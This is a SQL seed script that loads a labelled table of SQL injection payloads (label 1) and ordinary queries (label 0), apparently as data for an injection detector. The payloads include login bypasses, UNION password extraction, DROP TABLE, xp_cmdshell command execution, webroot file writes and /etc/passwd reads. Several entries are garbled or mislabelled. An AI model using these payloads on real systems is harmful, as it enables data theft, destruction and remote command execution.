SET IDENTITY_INSERT [dbo].[sql_commands] ON
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (1, N'DROP sampletable;--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (2, N'DROP sampletable;#', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (3, N'SELECT * FROM members WHERE username = ''admin''--'' AND password = ''password''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (4, N'DROP/*comment*/sampletable', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (5, N'DR/**/OP/*bypass blacklisting*/sampletable', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (6, N'SELECT/*avoid-spaces*/password/**/FROM/**/Members', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (7, N'SELECT /*!32302 1/0, */ 1 FROM tablename', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (8, N'10; DROP TABLE members /*', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (9, N'10; DROP TABLE members --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (10, N'SELECT /*!32302 1/0, */ 1 FROM tablename', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (11, N'ID: /*!32302 10*/', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (12, N'SELECT * FROM members; DROP members--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (13, N'ID: 10;DROP members --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (14, N'SELECT * FROM products WHERE id = 10; DROP members--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (15, N'SELECT IF(1=1,''true'',''false'')', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (16, N'IF (1=1) SELECT ''true'' ELSE SELECT ''false''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (17, N'IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (18, N'SELECT CASE WEHEN (1=1) THEN ''A'' ELSE ''B''END;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (19, N'if ((select user) = ''sa'' OR (select user) = ''dbo'') select 1 else select', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (20, N'SELECT CHAR(0x66)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (21, N'SELECT 0x5045', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (22, N'SELECT 0x50 + 0x45', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (23, N'SELECT login + ''-'' + password FROM members', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (24, N'SELECT login || ''-'' || password FROM members', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (25, N'SELECT CONCAT(login, password) FROM members', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (26, N'SELECT 0x457578', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (27, N'SELECT CONCAT(''0x'',HEX(''c:\\boot.ini''))', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (28, N'SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (29, N'SELECT CHAR(75)+CHAR(76)+CHAR(77)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (30, N'SELECT CHR(75)||CHR(76)||CHR(77)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (31, N'SELECT (CHaR(75)||CHaR(76)||CHaR(77))', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (32, N'SELECT LOAD_FILE(0x633A5C626F6F742E696E69)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (33, N'SELECT ASCII(''a'')', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (34, N'SELECT CHAR(64)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (35, N'SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (36, N' UNION SELECT 1, ''anotheruser'', ''doesnt matter'', 1--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (37, N'SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (38, N'admin'' --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (39, N'admin'' #', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (40, N'admin''/*', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (41, N''' or 1=1--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (42, N''' or 1=1#', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (43, N''' or 1=1/*', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (44, N''') or (''1''=''1--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (45, N'admin'' AND 1=0 UNION ALL SELECT ''admin'', ''81dc9bdb52d04dc20036dbd8313ed055''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (46, N''' HAVING 1=1 --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (47, N''' GROUP BY table.columnfromerror1 HAVING 1=1 --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (48, N''' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (49, N''' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (50, N'ORDER BY 1--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (51, N'ORDER BY 2--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (52, N''' union select sum(columntofind) from users--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (53, N'SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (54, N'11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (55, N'11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (56, N'11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (57, N'11223344) UNION SELECT 1,''2'',NULL,NULL WHERE 1=2 –-', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (58, N'11223344) UNION SELECT 1,''2'',3,NULL WHERE 1=2 –-', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (59, N'''; insert into users values( 1, ''hax0r'', ''coolpass'', 9 )/*', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (60, N'INSERT INTO members(id, user, pass) VALUES(1, ''''+SUBSTRING(@@version,1,10) ,10)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (61, N'bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (62, N'declare @o int exec sp_oacreate ''wscript.shell'', @o out exec sp_oamethod @o, ''run'', NULL, ''notepad.exe'' Username: ''; declare @o int exec sp_oacreate ''wscript.shell'', @o out exec sp_oamethod @o, ''run'', NULL, ''notepad.exe'' --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (63, N'EXEC master.dbo.xp_cmdshell ''cmd.exe dir c:''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (64, N'EXEC master.dbo.xp_cmdshell ''ping ''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (65, N'master..sysmessages', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (66, N'master..sysservers', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (67, N'masters..sysxlogins', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (68, N'sys.sql_logins', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (69, N'SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (70, N'DECLARE @result int; EXEC @result = xp_cmdshell ''dir *.exe'';IF (@result = 0) SELECT 0 ELSE SELECT 1/0', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (71, N'SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,''x''/*,10 ;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (72, N';shutdown --', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (73, N'EXEC sp_configure ''show advanced options'',1 RECONFIGURE', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (74, N'EXEC sp_configure ''xp_cmdshell'',1 RECONFIGURE', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (75, N'SELECT name FROM sysobjects WHERE xtype = ''U''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (76, N'SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ''tablenameforcolumnnames'')', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (77, N'... WHERE users NOT IN (''First User'', ''Second User'') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (78, N'SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (79, N'Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype=''U'' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = ''U'') as p where p.x=21', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (80, N''';BEGIN DECLARE @rt varchar(8000) SET @rd='':'' SELECT @rd=@rd+'' ''+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ''MEMBERS'') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (81, N'SELECT table_name FROM information_schema.tables WHERE table_schema = ''databasename''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (82, N'SELECT table_name, column_name FROM information_schema.columns WHERE table_name = ''tablename''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (83, N'SELECT * FROM all_tables WHERE OWNER = ''DATABASE_NAME''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (84, N'SELECT * FROM all_col_comments WHERE TABLE_NAME = ''TABLE''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (85, N'TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (86, N'FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103-- ', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (87, N'TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) ', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (88, N'FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (89, N'TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) ', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (90, N'FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (91, N'TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (92, N'FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (93, N'FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (94, N'WAITFOR DELAY ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (95, N'WAITFOR DELAY ''0:0:0.51''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (96, N'if (select user) = ''sa'' waitfor delay ''0:0:10''', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (97, N'ProductID = 1;waitfor delay ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (98, N'ProductID =1);waitfor delay ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (99, N'ProductID =1'';waitfor delay ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (100, N'ProductID =1'');waitfor delay ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (101, N'ProductID =1));waitfor delay ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (102, N'ProductID =1''));waitfor delay ''0:0:10''--', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (103, N'IF EXISTS (SELECT * FROM users WHERE username = ''root'') BENCHMARK(1000000000,MD5(1))', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (104, N'IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (105, N'SELECT pg_sleep(10);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (106, N'SELECT sleep(10);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (107, N'(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message((''xyz''),10) ELSE dbms_pipe.receive_message((''xyz''),1) END FROM dual)', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (108, N'SELECT * FROM Users WHERE UserId = 105 OR 1=1;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (109, N'SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (110, N'SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass"', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (111, N'SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (112, N'SELECT * FROM Users; DROP TABLE Suppliers', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (113, N'SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (114, N'SELECT @@version', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (115, N'SELECT 1; #comment', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (116, N'SELECT /*comment*/1;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (117, N'SELECT user();', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (118, N'SELECT system_user();', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (119, N'SELECT user FROM mysql.user; — priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (120, N'ELECT host, user, password FROM mysql.user; — priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (121, N'SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (122, N'SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (123, N'SELECT database()', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (124, N'SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (125, N'SELECT distinct(db) FROM mysql.db — priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (126, N'SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (127, N'SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (128, N'SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (129, N'SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (130, N'SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (131, N'SELECT substr(‘abcd’, 3, 1); # returns c', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (132, N'SELECT 6 & 2; # returns 2', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (133, N'SELECT 6 & 1; # returns 0', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (134, N'SELECT char(65); # returns A', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (135, N'SELECT ascii(‘A’); # returns 65', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (136, N'SELECT cast(’1'' AS unsigned integer);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (137, N'SELECT cast(’123'' AS char);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (138, N'SELECT CONCAT(‘A’,''B’); #returns AB', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (139, N'SELECT CONCAT(‘A’,''B’,''C’); # returns ABC', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (140, N'SELECT if(1=1,’foo’,''bar’); — returns ‘foo’', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (141, N'SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (142, N'SELECT 0×414243; # returns ABC', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (143, N'SELECT BENCHMARK(1000000,MD5(‘A’));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (144, N'SELECT SLEEP(5); # >= 5.0.12', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (145, N'…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (146, N'SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (147, N'CREATE USER test1 IDENTIFIED BY ‘pass1''; — priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (148, N'DROP USER test1; — priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (149, N'GRANT ALL PRIVILEGES ON *.* TO test1@’%''; — priv', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (150, N'SELECT @@datadir;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (151, N'SELECT * FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (152, N'SELECT CustomerName, City FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (153, N'SELECT Country FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (154, N'SELECT DISTINCT Country FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (155, N'SELECT COUNT(DISTINCT Country) FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (156, N'SELECT Count(*) AS DistinctCountries FROM (SELECT DISTINCT Country FROM Customers);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (157, N'SELECT * FROM Customers WHERE Country=''Mexico'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (158, N'SELECT * FROM Customers WHERE CustomerID=1;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (159, N'SELECT * FROM Customers WHERE Country=''Germany'' AND City=''Berlin'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (160, N'SELECT * FROM Customers WHERE City=''Berlin'' OR City=''München'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (161, N'SELECT * FROM Customers WHERE Country=''Germany'' OR Country=''Spain'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (162, N'SELECT * FROM Customers WHERE Country=''Germany'' AND (City=''Berlin'' OR City=''München'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (163, N'SELECT * FROM Customers WHERE NOT Country=''Germany'' AND NOT Country=''USA'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (164, N'SELECT * FROM Customers ORDER BY Country;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (165, N'SELECT * FROM Customers ORDER BY Country DESC;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (166, N'SELECT * FROM Customers ORDER BY Country ASC, CustomerName DESC;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (167, N'INSERT INTO Customers (CustomerName, ContactName, Address, City, PostalCode, Country) VALUES (''Cardinal'',''Tom B. Erichsen'',''Skagen 21'',''Stavanger'',''4006'',''Norway'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (168, N'INSERT INTO Customers (CustomerName, City, Country) VALUES (''Cardinal'', ''Stavanger'', ''Norway'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (169, N'SELECT CustomerName, ContactName, Address FROM Customers WHERE Address IS NULL;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (170, N'SELECT CustomerName, ContactName, Address FROM Customers WHERE Address IS NOT NULL;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (171, N'UPDATE Customers SET ContactName=''Alfred Schmidt'', City=''Frankfurt'' WHERE CustomerID=1;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (172, N'UPDATE Customers SET ContactName=''Juan'' WHERE Country=''Mexico'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (173, N'UPDATE Customers SET ContactName=''Juan'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (174, N'DELETE FROM Customers WHERE CustomerName=''Alfreds Futterkiste'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (175, N'DELETE FROM Customers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (176, N'SELECT TOP 3 * FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (177, N'SELECT * FROM Customers LIMIT 3;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (178, N'SELECT * FROM Customers WHERE ROWNUM <= 3;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (179, N'SELECT TOP 50 PERCENT * FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (180, N'SELECT TOP 3 * FROM Customers WHERE Country=''Germany'';', 0)
